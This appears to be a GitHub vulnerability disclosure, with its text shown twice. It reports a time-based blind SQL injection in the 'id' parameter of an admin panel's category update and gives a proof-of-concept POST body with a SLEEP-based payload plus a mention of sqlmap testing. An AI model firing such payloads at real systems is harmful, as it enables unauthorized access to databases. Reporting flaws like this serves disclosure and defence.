You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Log in to the background as the default account admin.
We click in order and grab packets:
There is a time-based blind SQL injection vulnerability in the location of id.
POC: http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B
sqlmap:
Save the HTTP request package as a file .
Test using the SQLMap tool :
The text was updated successfully, but these errors were encountered:
Log in to the background as the default account admin.
We click in order and grab packets:
There is a time-based blind SQL injection vulnerability in the location of id.
POC:
http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B
sqlmap:
Save the HTTP request package as a file .
Test using the SQLMap tool :
The text was updated successfully, but these errors were encountered: